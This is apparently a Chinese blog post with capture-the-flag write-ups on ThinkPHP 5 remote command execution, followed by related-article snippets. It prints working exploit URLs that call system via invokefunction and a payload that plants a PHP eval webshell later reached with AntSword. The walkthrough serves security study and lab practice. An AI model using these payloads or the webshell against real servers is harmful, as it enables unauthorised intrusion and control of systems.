CTF——Thinkphp5远程命令执行漏洞利用

最新推荐文章于 2025-04-21 19:40:26 发布
最新推荐文章于 2025-04-21 19:40:26 发布
阅读量7.8k 收藏 35
点赞数 12
分类专栏: Web 安全 CTF-Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45521281/article/details/105907276
版权

[BJDCTF 2nd]old-hack(5.0.23)

进入之后:在这里插入图片描述
打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。

Thinkphp5远程命令执行漏洞

漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 $_POST['_method']来传递真实的请求方法。但由于框架没有对参数进行验证,导致攻击者可以设置$_POST['_method']='__construct'而让该类的变量被覆盖。攻击者利用该方式将filter变量覆盖为system等函数名,当内部进行参数过滤时便会进行执行任意命令。

像这种题,知道了是哪个版本的话就搜一搜(https://www.exploit-db.com/)就能找到与之配套的payload,也可以用kali的searchsploit。

想办法构造一个ThinkPHP的报错看一下详细版本:

http://a504dd5e-6b7c-407f-ab11-ee1c9efdc3f3.node3.buuoj.cn/index.php?s=1
或
http://a504dd5e-6b7c-407f-ab11-ee1c9efdc3f3.node3.buuoj.cn/index.php?s=captcha

Thinkphp框架有s参数可以加载模块,随便加点什么,发现开了debug模式,其中可以看到Thinkphp的版本。
在这里插入图片描述
该版本为5.0.23

使用kali searchsploit查找一下漏洞的利用方法:
searchsploit thinkphp 查找thinkphp相关的漏洞
在这里插入图片描述
发现最后一个是thinkphp5.X版本的远程命令执行漏洞,我们进入该漏洞的文件46150.txt:
在这里插入图片描述
打开后显示了thinkphp5.X版本所有版本的远程命令执行漏洞的利用方法
在这里插入图片描述
在这里插入图片描述
我们找到5.0.23版本的:
在这里插入图片描述
利用方法是用POST传参,我们用下面那个完整版的。
我们构造一个payload查看一下根目录的内容:
在这里插入图片描述
发现了flag文件,把ls /换成cat /flag,获得最后的flag
在这里插入图片描述
参考:https://blog.youkuaiyun.com/zydbk123456/article/details/105774002

写入webshell木马:
在这里插入图片描述
访问apple.php,显示php代码就成功了:
在这里插入图片描述
可见成功了,我们连蚁剑:
在这里插入图片描述
成功。

连菜刀:
在这里插入图片描述
成功。

攻防世界-php_rce

进入题目:
在这里插入图片描述
Thinkphp5远程命令执行漏洞。先报错看一下版本

http://124.126.19.106:57941/index.php?s=1
或
http://124.126.19.106:57941/index.php?s=captcha

在这里插入图片描述
版本为5.0.20。

ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

影响范围

5.x < 5.1.31, <= 5.0.23

在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法

我们在kali searchsploit查找一下该版本漏洞的利用方法(5.0.21和5.0.22都适用):
在这里插入图片描述
漏洞利用

1.利用system函数远程命令执行

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]
=system&vars[1][]=whoami

在这里插入图片描述

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

在这里插入图片描述
2.通过phpinfo函数写出phpinfo()的信息

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

在这里插入图片描述
3.写入webshell木马:

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php highlight_file(__FILE__); @eval($_POST["apple"]);?>' > apple.php

访问apple.php能显示php代码就成功了:
在这里插入图片描述
试试:
在这里插入图片描述
直接连接蚁剑,(菜刀连不上)
在这里插入图片描述

附录:

别的版本的Thinkphp5远程命令执行漏洞利用也是这个思路。

ATT&CK实战系列——红队实战(五)
lza20001103的博客
10-17 2927
ATT&CK实战系列——红队实战(五) 文章目录ATT&CK实战系列——红队实战(五)前言靶场搭建网络配置外网渗透内网渗透内网信息收集msf反弹shell设置路由探测内网存活主机cs上线横向移动fscan扫描内网主机端口拿下域控后记 前言 前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。 靶场搭建 靶场下载
内网安全——域横向内网漫游Socks代理隧道技术
世间繁华梦一出
08-06 636
内网漫游——内网穿透Socks代理技术内网穿透Ngrok测试演示——两个内网通讯上线内网穿透Frp自建跳板测试——两个内网通讯上线CFS三层内网漫游安全测试演练——某CTF线下2019 内网穿透Ngrok测试演示——两个内网通讯上线 Ngrok代理工具的作用就是(如下图)在两个不同内网的主机之间的外网提供一台服务器, 内网穿透Frp自建跳板测试——两个内网通讯上线 CFS三层内网漫游安全测试演练——某CTF线下2019 ...
攻防世界 ThinkPHP V5漏洞解析及利用
热门推荐
Haowill的博客
04-12 1万+
ThinkPHP V5 攻防世界这道题,考察的是thinkphp V5漏洞,接下来我详细介绍一下thinkphp V5这个漏洞ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5....
thinkphp漏洞利用工具-thinkphp_gui_tools(三)
SuperherRo的博客
08-17 6180
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
ThinkPHP5 的 SQL 注入漏洞
最新发布
sucker的博客
04-21 762
也就是:$_GET['ids'] 是一个数组,key 为 '0,updatexml(0,concat(0xa,user()),0)'这是一个报错注入语句,updatexml() 是 MySQL 中常见的报错函数,用于将数据输出到错误信息中。攻击者可利用漏洞构造恶意 SQL 语句,绕过预编译机制,直接操作数据库,导致数据泄露、篡改甚至服务器沦陷。时,预编译过程会直接解析 SQL 语句中的动态内容,导致攻击者可通过报错注入(如。)是 ThinkPHP5 框架中一系列因设计缺陷导致的安全问题,主要影响早期版本。
ctfshow-thinkphp
giaogiao123的博客
08-23 1037
基础知识 关于thinkphp需要知道的基本知识 https://www.kancloud.cn/manual/thinkphp/1696 demo1 修改 D:\phpStudy\PHPTutorial\WWW\thinkphp-3.2\thinkphp-3.2\Application\Home\Controller\IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class Inde
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 4310
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
ctf之php漏洞,ctf入门到Thinkphp2.x、3.0-3.1版代码执行漏洞分析
weixin_39738380的博客
04-01 798
前言:文章可能有点长,小弟不才,只能靠刷ctf来理解一些内容。若有不恰当之处,望大佬们不吝赐教。一、[BJDCTF2020]ZJCTF先做一道ctf压压惊:[BJDCTF2020]ZJCTF构建以下payload,进入if判断,并且进入include()函数?text=data://text/plain,I have a dream&file=php://filter/convert.ba...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6080
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
网络安全知识体系
鱼的博客
03-13 5664
SIEM (安全信息和事件管理) SIEM(安全信息和事件管理)是一个由不同的监视和分析组件组成的安全和审计系统。最近网络攻击的增加,加上组织要求更严格的安全法规,使SIEM成为越来越多的组织正在采用的标准安全方法。 但是SIEM实际上涉及到什么呢?它由哪些不同的部分组成?SIEM实际上如何帮助减轻攻击?本文试图提供一种SIEM 101。后续文章将深入探讨一些可用于实际实现SIEM的解决方案。...
ctfwebphp代码审计
03-13
针对ThinkPHP框架,在2.x以及3.0至3.1版本中存在的远程命令执行(RCE)漏洞是一个重要的研究对象[^1]。这类漏洞允许攻击者通过精心构造的数据包来触发服务器端未预期的行为,从而可能获得对系统的控制权。 #### 2. ...
ThinkPHP 漏洞利用工具
Websec
05-18 6793
当看到ThinkPHP十年磨一剑的提示,那么今天这里分享的工具就可以派上用场了,一键检测ThinkPHP全版本漏洞。 01、TPscan 一键ThinkPHP漏洞检测,基于Python3,命令行检测,集成了14个常见的ThinkPHP框架漏洞检测插件。 github项目地址: https://github.com/Lucifer1993/TPscan 02、Aazhen-V3.1 支持ThinkPHP 2.x RCE,Thinkphp5 5.0.22/5.1.29RCE,ThinkPHP5
ctfshow ThinkPHP专题 1
qq_61768489的博客
07-23 851
PATHINFO模式是系统的默认URL模式,提供了最好的SEO支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。REWRITE模式是在PATHINFO模式的基础上添加了重写规则的支持,可以去掉URL地址里面的入口文件index.php,但是需要额外配置WEB服务器的重写规则。m参数表示模块,c参数表示控制器,a参数表示操作(当然这些参数都是可以配置的),后面的表示其他GET参数。,ThinkPHP支持的URL模式有四种普通模式、PATHINFO、REWRITE和兼容模式。...
thinkphp漏洞利用工具-ThinkphpGUI(一)
SuperherRo的博客
08-17 5818
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
Thinkphp5漏洞利用工具
gitblog_09736的博客
10-17 852
Thinkphp5漏洞利用工具 【下载地址】Thinkphp5漏洞利用工具 本仓库提供了一个名为`tp5漏洞利用工具.zip`的资源文件下载。该工具专门用于利用Thinkphp5框架中的代码执行漏洞。工具包内包含两个利用工具,并附带详细的利用原理说明。使用此工具,您可以在检测到Thinkphp5漏洞的情况下,直接获取目标...
thinkphp漏洞利用工具-ThinkphpGUI(二)
SuperherRo的博客
08-17 1778
thinkphp漏洞利用工具
PHP反序列化--简单ctf题--pop链(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4877
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
thinkphp漏洞利用工具-ThinkphpGUI(一),附下载链接。
白帽子黑客SuperherRo
09-23 565
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值